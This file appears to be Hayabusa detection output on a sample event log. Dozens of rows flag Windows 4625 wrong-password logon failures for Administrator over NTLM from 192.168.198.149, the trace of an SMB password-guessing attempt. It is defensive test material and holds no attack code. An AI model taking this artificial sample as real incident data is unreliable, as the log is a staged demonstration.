2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
